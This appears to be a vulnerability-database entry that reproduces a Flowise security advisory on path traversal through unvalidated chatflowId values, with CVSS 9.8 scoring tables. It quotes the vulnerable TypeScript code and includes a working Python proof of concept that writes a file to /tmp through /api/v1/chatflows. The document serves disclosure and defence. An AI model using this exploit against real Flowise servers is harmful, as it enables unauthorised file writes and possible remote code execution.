Search for vulnerabilities
| Vulnerability ID | VCID-prvx-mjqx-fuew |
| Aliases |
GHSA-q67q-549q-p849
|
| Summary | Flowise has arbitrary file access due to missing chat flow id validation ### Summary Missing chat flow id validation allows an attacker to access arbitrary file. ### Details Commit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues. **Case 1** When creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data. ```typescript export const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => { // ... } else { const dir = path.join(getStoragePath(), chatflowid) // path traversal here if (!fs.existsSync(dir)) { fs.mkdirSync(dir, { recursive: true }) } const splitDataURI = fileBase64.split(',') const filename = splitDataURI.pop()?.split(':')[1] ?? '' const bf = Buffer.from(splitDataURI.pop() || '', 'base64') const sanitizedFilename = _sanitizeFilename(filename) const filePath = path.join(dir, sanitizedFilename) fs.writeFileSync(filePath, bf) fileNames.push(sanitizedFilename) return 'FILE-STORAGE::' + JSON.stringify(fileNames) } } ``` **Case 2** When downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path. Note that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication. ### PoC Launch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'. ```python import requests import json url = "http://localhost:8080/api/v1/chatflows" headers = {"x-request-from": "internal"} nodedata = { "category" : "Document Loaders", "inputs" : { "key" : "data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn" } } flownode = { "id" : "a", "data" : nodedata } flowdata = { "nodes" : [flownode], "edges" : [], "viewport" : { "x" : 1, "y" : 1, "zoom" : 1 } } data = { "id" : "../../../../../tmp", "name" : "name", "flowData" : json.dumps(flowdata) } res = requests.post(url, json=data, headers=headers) ``` ### Impact 1. Arbitrary file read / write 2. Remote Code Execution 3. Data loss |
| Status | Published |
| Exploitability | None |
| Weighted Severity | None |
| Risk | None |
| Affected and Fixed Packages | Package Details |
| System | Score | Found at |
|---|---|---|
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise |
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f |
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 |
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849 |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849 |
| Attack Vector (AV) | Attack Complexity (AC) | Privileges Required (PR) | User Interaction (UI) | Scope (S) | Confidentiality Impact (C) | Integrity Impact (I) | Availability Impact (A) |
|---|---|---|---|---|---|---|---|
network adjacent_network local physical |
low high |
none low high |
none required |
unchanged changed |
high low none |
high low none |
high low none |
| Attack Vector (AV) | Attack Complexity (AC) | Privileges Required (PR) | User Interaction (UI) | Scope (S) | Confidentiality Impact (C) | Integrity Impact (I) | Availability Impact (A) |
|---|---|---|---|---|---|---|---|
network adjacent_network local physical |
low high |
none low high |
none required |
unchanged changed |
high low none |
high low none |
high low none |
| Attack Vector (AV) | Attack Complexity (AC) | Privileges Required (PR) | User Interaction (UI) | Scope (S) | Confidentiality Impact (C) | Integrity Impact (I) | Availability Impact (A) |
|---|---|---|---|---|---|---|---|
network adjacent_network local physical |
low high |
none low high |
none required |
unchanged changed |
high low none |
high low none |
high low none |
| Attack Vector (AV) | Attack Complexity (AC) | Privileges Required (PR) | User Interaction (UI) | Scope (S) | Confidentiality Impact (C) | Integrity Impact (I) | Availability Impact (A) |
|---|---|---|---|---|---|---|---|
network adjacent_network local physical |
low high |
none low high |
none required |
unchanged changed |
high low none |
high low none |
high low none |
No EPSS data available for this vulnerability.
| Date | Actor | Action | Source | VulnerableCode Version |
|---|---|---|---|---|
| 2026-06-04T17:08:28.323895+00:00 | GithubOSV Importer | Import | https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-q67q-549q-p849/GHSA-q67q-549q-p849.json | 38.6.0 |